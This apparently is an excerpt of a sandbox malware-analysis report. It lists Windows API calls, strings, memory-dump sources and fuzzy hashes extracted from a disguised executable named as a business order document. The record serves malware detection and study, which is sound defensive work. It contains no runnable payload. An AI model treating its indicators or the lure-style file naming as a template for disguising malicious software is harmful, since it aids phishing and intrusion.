                                                                                            • SendMessageW.USER32(?,00001109,00000002), ref: 00404FE6
                                                                                            • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404FF2
                                                                                            • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00405004
                                                                                            • DeleteObject.GDI32(00000000), ref: 00405007
                                                                                            • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00405032
                                                                                            • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 0040503E
                                                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 004050D9
                                                                                            • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00405109
                                                                                              • Part of subcall function 004044D5: SendMessageW.USER32(00000028,?,00000001,00404300), ref: 004044E3
                                                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 0040511D
                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 0040514B
                                                                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00405159
                                                                                            • ShowWindow.USER32(?,00000005), ref: 00405169
                                                                                            • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405264
                                                                                            • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004052C9
                                                                                            • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 004052DE
                                                                                            • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405302
                                                                                            • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405322
                                                                                            • ImageList_Destroy.COMCTL32(00000000), ref: 00405337
                                                                                            • GlobalFree.KERNEL32(00000000), ref: 00405347
                                                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004053C0
                                                                                            • SendMessageW.USER32(?,00001102,?,?), ref: 00405469
                                                                                            • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405478
                                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 004054A3
                                                                                            • ShowWindow.USER32(?,00000000), ref: 004054F1
                                                                                            • GetDlgItem.USER32(?,000003FE), ref: 004054FC
                                                                                            • ShowWindow.USER32(00000000), ref: 00405503
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2088046348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2088027514.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2088067648.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2088088396.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2088088396.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2088088396.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000443000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000446000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000467000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Company Profile and new order-202401127.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                            • String ID: $M$N
                                                                                            • API String ID: 2564846305-813528018
                                                                                            • Opcode ID: 963d0e2195837636cb6f5b073c234fd9fc9862b141633064f8114fc5dd327728
                                                                                            • Instruction ID: 467e9106b9ab4b1e9b2d04e68362d71007c986f05034cc4a0cb7dcf353c6e141
                                                                                            • Opcode Fuzzy Hash: 963d0e2195837636cb6f5b073c234fd9fc9862b141633064f8114fc5dd327728
                                                                                            • Instruction Fuzzy Hash: 16029B70A00609EFDB20DF95DD45AAF7BB5FB44314F10817AE610BA2E1D7B98A42CF58
                                                                                            APIs
                                                                                            • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004046FD
                                                                                            • GetDlgItem.USER32(?,000003E8), ref: 00404711
                                                                                            • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040472E
                                                                                            • GetSysColor.USER32(?), ref: 0040473F
                                                                                            • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 0040474D
                                                                                            • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040475B
                                                                                            • lstrlenW.KERNEL32(?), ref: 00404760
                                                                                            • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040476D
                                                                                            • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404782
                                                                                            • GetDlgItem.USER32(?,0000040A), ref: 004047DB
                                                                                            • SendMessageW.USER32(00000000), ref: 004047E2
                                                                                            • GetDlgItem.USER32(?,000003E8), ref: 0040480D
                                                                                            • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404850
                                                                                            • LoadCursorW.USER32(00000000,00007F02), ref: 0040485E
                                                                                            • SetCursor.USER32(00000000), ref: 00404861
                                                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 0040487A
                                                                                            • SetCursor.USER32(00000000), ref: 0040487D
                                                                                            • SendMessageW.USER32(00000111,00000001,00000000), ref: 004048AC
                                                                                            • SendMessageW.USER32(00000010,00000000,00000000), ref: 004048BE
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2088046348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Company Profile and new order-202401127.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                            • String ID: : Completed$N
                                                                                            • API String ID: 3103080414-2140067464
                                                                                            • Opcode ID: d465d3d5382bb59059b47d3503e7a252332af71f120e52871dcbc052c6d80ab7
                                                                                            • Instruction ID: fa786ba7610ecb1ae21ae2169d8ef808fc0b2da043ab7544d4c43deaa2774949
                                                                                            • Opcode Fuzzy Hash: d465d3d5382bb59059b47d3503e7a252332af71f120e52871dcbc052c6d80ab7
                                                                                            • Instruction Fuzzy Hash: 7F61B3B1A00209BFDB10AF64DD85A6A7B79FB84354F00843AFB05B61D0D7B9AD61CF58
                                                                                            APIs
                                                                                            • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                            • BeginPaint.USER32(?,?), ref: 00401047
                                                                                            • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                            • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                            • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                            • DeleteObject.GDI32(?), ref: 004010ED
                                                                                            • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                            • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                            • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                            • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                            • DrawTextW.USER32(00000000,00428A20,000000FF,00000010,00000820), ref: 00401156
                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                            • DeleteObject.GDI32(?), ref: 00401165
                                                                                            • EndPaint.USER32(?,?), ref: 0040116E
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2088046348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Company Profile and new order-202401127.jbxd
                                                                                            Similarity
                                                                                            • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                            • String ID: F
                                                                                            • API String ID: 941294808-1304234792
                                                                                            • Opcode ID: fcc37e75e13d0dca8524aaa06a8ee829d240d30c68f9aadea354bd02ab1c226a
                                                                                            • Instruction ID: d1034cbb9d528375343357a353c0022e70e8214492c202610c441178c5bfc5cd
                                                                                            • Opcode Fuzzy Hash: fcc37e75e13d0dca8524aaa06a8ee829d240d30c68f9aadea354bd02ab1c226a
                                                                                            • Instruction Fuzzy Hash: FC417B71800249AFCB058FA5DE459AFBBB9FF45314F00802EF592AA1A0CB74DA55DFA4
                                                                                            APIs
                                                                                            • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406302,?,?), ref: 004061A2
                                                                                            • GetShortPathNameW.KERNEL32(?,004265A8,00000400), ref: 004061AB
                                                                                              • Part of subcall function 00405F76: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040625B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F86
                                                                                              • Part of subcall function 00405F76: lstrlenA.KERNEL32(00000000,?,00000000,0040625B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FB8
                                                                                            • GetShortPathNameW.KERNEL32(?,00426DA8,00000400), ref: 004061C8
                                                                                            • wsprintfA.USER32 ref: 004061E6
                                                                                            • GetFileSize.KERNEL32(00000000,00000000,00426DA8,C0000000,00000004,00426DA8,?,?,?,?,?), ref: 00406221
                                                                                            • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406230
                                                                                            • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406268
                                                                                            • SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,004261A8,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004062BE
                                                                                            • GlobalFree.KERNEL32(00000000), ref: 004062CF
                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004062D6
                                                                                              • Part of subcall function 00406011: GetFileAttributesW.KERNELBASE(00000003,004030C2,C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exe,80000000,00000003), ref: 00406015
                                                                                              • Part of subcall function 00406011: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406037
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2088046348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Company Profile and new order-202401127.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                            • String ID: %ls=%ls$[Rename]
                                                                                            • API String ID: 2171350718-461813615
                                                                                            • Opcode ID: ad23c2c12608704314c1a1c2d98a70ea5e027cecb5ac03fef5858bd56b87dd73
                                                                                            • Instruction ID: d8f03b5b48010a369f687ed07a259b5d04d98e8e290d987932ab0f9f84d7b5e4
                                                                                            • Opcode Fuzzy Hash: ad23c2c12608704314c1a1c2d98a70ea5e027cecb5ac03fef5858bd56b87dd73
                                                                                            • Instruction Fuzzy Hash: 89313230201325BFD6207B659D48F2B3A6CDF41714F12007EBA02F62C2EA7D98218ABD
                                                                                            APIs
                                                                                            • CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exe",75923420,C:\Users\user\AppData\Local\Temp\,00000000,004034D7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037E6,?,00000008,0000000A,0000000C), ref: 00406832
                                                                                            • CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00406841
                                                                                            • CharNextW.USER32(?,"C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exe",75923420,C:\Users\user\AppData\Local\Temp\,00000000,004034D7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037E6,?,00000008,0000000A,0000000C), ref: 00406846
                                                                                            • CharPrevW.USER32(?,?,75923420,C:\Users\user\AppData\Local\Temp\,00000000,004034D7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037E6,?,00000008,0000000A,0000000C), ref: 00406859
                                                                                            Strings
                                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 004067D0
                                                                                            • *?|<>/":, xrefs: 00406821
                                                                                            • "C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exe", xrefs: 00406813
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2088046348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2088027514.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2088067648.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2088088396.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2088088396.0000000000425000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2088088396.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2088088396.000000000042B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2088088396.000000000042E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2088088396.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2088088396.0000000000443000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2088255339.0000000000446000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2088255339.0000000000459000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2088255339.0000000000467000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Company Profile and new order-202401127.jbxd
                                                                                            Similarity
                                                                                            • API ID: Char$Next$Prev
                                                                                            • String ID: "C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                            • API String ID: 589700163-2026325617
                                                                                            • Opcode ID: d9890b2689dddc4776a4db6af1629ac80bd1bcc56ba6148264ccbff8cf15ab87
                                                                                            • Instruction ID: 2d41fa7b6770246c30beeceb47eb68b435a53440eacd13368e2f30b8c56315d6
                                                                                            • Opcode Fuzzy Hash: d9890b2689dddc4776a4db6af1629ac80bd1bcc56ba6148264ccbff8cf15ab87
                                                                                            • Instruction Fuzzy Hash: A511935680121296DB303B14CC44ABB66E8AF54794F52C03FE999732C1E77C5C9296BD
                                                                                            APIs
                                                                                            • GetWindowLongW.USER32(?,000000EB), ref: 00404524
                                                                                            • GetSysColor.USER32(00000000), ref: 00404562
                                                                                            • SetTextColor.GDI32(?,00000000), ref: 0040456E
                                                                                            • SetBkMode.GDI32(?,?), ref: 0040457A
                                                                                            • GetSysColor.USER32(?), ref: 0040458D
                                                                                            • SetBkColor.GDI32(?,?), ref: 0040459D
                                                                                            • DeleteObject.GDI32(?), ref: 004045B7
                                                                                            • CreateBrushIndirect.GDI32(?), ref: 004045C1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2088046348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Company Profile and new order-202401127.jbxd
                                                                                            Similarity
                                                                                            • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                            • String ID:
                                                                                            • API String ID: 2320649405-0
                                                                                            • Opcode ID: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                                                                                            • Instruction ID: 524417ed32742d4b72cd17798d780815826fd18a7bcb7bb0f1ed1fdd1052d135
                                                                                            • Opcode Fuzzy Hash: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                                                                                            • Instruction Fuzzy Hash: B22135B1500705AFCB319F78DD08B577BF5AF81714B048A2DEA96A26E0D738D944CB54
                                                                                            APIs
                                                                                            • ReadFile.KERNEL32(?,?,?,?), ref: 0040275D
                                                                                            • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402798
                                                                                            • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027BB
                                                                                            • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027D1
                                                                                              • Part of subcall function 004060F2: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00406108
                                                                                            • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040287D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2088046348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Company Profile and new order-202401127.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                            • String ID: 9
                                                                                            • API String ID: 163830602-2366072709
                                                                                            • Opcode ID: 0fe20a848d4a285c173513a47146d0bdd1f0b43cc80ef0beb9e6d9777ffbd6ad
                                                                                            • Instruction ID: 4938fc2aff7960a3a7fedf371d3c64c497049ea43b58312dd80c80f6ae9549af
                                                                                            • Opcode Fuzzy Hash: 0fe20a848d4a285c173513a47146d0bdd1f0b43cc80ef0beb9e6d9777ffbd6ad
                                                                                            • Instruction Fuzzy Hash: 5051FB75D0421AABDF249FD4CA84AAEBB79FF04344F10817BE901B62D0D7B49D828B58
                                                                                            APIs
                                                                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404E76
                                                                                            • GetMessagePos.USER32 ref: 00404E7E
                                                                                            • ScreenToClient.USER32(?,?), ref: 00404E98
                                                                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404EAA
                                                                                            • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404ED0
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2088046348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Company Profile and new order-202401127.jbxd
                                                                                            Similarity
                                                                                            • API ID: Message$Send$ClientScreen
                                                                                            • String ID: f
                                                                                            • API String ID: 41195575-1993550816
                                                                                            • Opcode ID: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
                                                                                            • Instruction ID: cfceae8db68972c520d490933057d7cb8d8acba3ea2256e028311c612775fba1
                                                                                            • Opcode Fuzzy Hash: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
                                                                                            • Instruction Fuzzy Hash: A3015E7190021CBADB00DB94DD85BFFBBBCAF95B11F10412BBA51B61D0C7B49A418BA4
                                                                                            APIs
                                                                                            • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB6
                                                                                            • MulDiv.KERNEL32(000C2EA7,00000064,000C2EAB), ref: 00402FE1
                                                                                            • wsprintfW.USER32 ref: 00402FF1
                                                                                            • SetWindowTextW.USER32(?,?), ref: 00403001
                                                                                            • SetDlgItemTextW.USER32(?,00000406,?), ref: 00403013
                                                                                            Strings
                                                                                            • verifying installer: %d%%, xrefs: 00402FEB
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2088046348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Company Profile and new order-202401127.jbxd
                                                                                            Similarity
                                                                                            • API ID: Text$ItemTimerWindowwsprintf
                                                                                            • String ID: verifying installer: %d%%
                                                                                            • API String ID: 1451636040-82062127
                                                                                            • Opcode ID: 7c72eb226873640f15370cd8631d515f33e7e0e766319f11269e715f4bf9c46b
                                                                                            • Instruction ID: f83dc0eaaa7e9df2961e53678d13a3899a4bf5fcca0c0537cb294ee04905d4b1
                                                                                            • Opcode Fuzzy Hash: 7c72eb226873640f15370cd8631d515f33e7e0e766319f11269e715f4bf9c46b
                                                                                            • Instruction Fuzzy Hash: EF014F71640208BBEF209F60DD49FEE3B69AB44345F108039FA06A51D0DBB99A559F58
                                                                                            APIs
                                                                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B6
                                                                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029D2
                                                                                            • GlobalFree.KERNEL32(?), ref: 00402A0B
                                                                                            • GlobalFree.KERNEL32(00000000), ref: 00402A1E
                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A3A
                                                                                            • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A4D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2088046348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Company Profile and new order-202401127.jbxd
                                                                                            Similarity
                                                                                            • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                            • String ID:
                                                                                            • API String ID: 2667972263-0
                                                                                            • Opcode ID: b07bb42a36a53ac2b652948ec131e563e6f6be8de0f89c4bf93d81cf64cebf1f
                                                                                            • Instruction ID: 66908bbe9354c3b59104e874c770ae4161d9466efedc1f742b63756e9967f80f
                                                                                            • Opcode Fuzzy Hash: b07bb42a36a53ac2b652948ec131e563e6f6be8de0f89c4bf93d81cf64cebf1f
                                                                                            • Instruction Fuzzy Hash: 54319E71900128ABCF21AFA5CE49D9E7E79AF44364F10423AF514762E1CB794C429FA8
                                                                                            APIs
                                                                                            • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402F02
                                                                                            • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F4E
                                                                                            • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F57
                                                                                            • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F6E
                                                                                            • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F79
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2088046348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2088027514.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088067648.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Company Profile and new order-202401127.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseEnum$DeleteValue
                                                                                            • String ID:
                                                                                            • API String ID: 1354259210-0
                                                                                            • Opcode ID: 2404979ab5d72bd1f47e4c5d2100d154d2dcf156ce7fec90999c2a50aae3b712
                                                                                            • Instruction ID: 48bf034c557530f45265713f896c64b121a5f1f2f5b25ab6521791cb913d5ed3
                                                                                            • Opcode Fuzzy Hash: 2404979ab5d72bd1f47e4c5d2100d154d2dcf156ce7fec90999c2a50aae3b712
                                                                                            • Instruction Fuzzy Hash: 74215A7150010ABFDF119F90CE89EEF7B7DEB54388F110076B949B11A0D7B49E54AA68
                                                                                            APIs
                                                                                            • GetDlgItem.USER32(?,?), ref: 00401D9F
                                                                                            • GetClientRect.USER32(?,?), ref: 00401DEA
                                                                                            • LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E1A
                                                                                            • SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E2E
                                                                                            • DeleteObject.GDI32(00000000), ref: 00401E3E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2088046348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2088027514.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088067648.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Company Profile and new order-202401127.jbxd
                                                                                            Similarity
                                                                                            • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                            • String ID:
                                                                                            • API String ID: 1849352358-0
                                                                                            • Opcode ID: b4553b6f8f96a3615d4cb1d74016621c3cb3daa09826911c1e5c071ec9b0e61c
                                                                                            • Instruction ID: 002387d4b88dbb62f40c54eb0dee3f9a721ef30fc2dbb8ae50818b7fec09efb0
                                                                                            • Opcode Fuzzy Hash: b4553b6f8f96a3615d4cb1d74016621c3cb3daa09826911c1e5c071ec9b0e61c
                                                                                            • Instruction Fuzzy Hash: 0F21F872A00119AFCB15DF98DE45AEEBBB5EB08304F14003AF945F62A0D7789D41DB98
                                                                                            APIs
                                                                                            • GetDC.USER32(?), ref: 00401E56
                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E70
                                                                                            • MulDiv.KERNEL32(00000000,00000000), ref: 00401E78
                                                                                            • ReleaseDC.USER32(?,00000000), ref: 00401E89
                                                                                            • CreateFontIndirectW.GDI32(0040CDC8), ref: 00401ED8
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2088046348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2088027514.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088067648.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
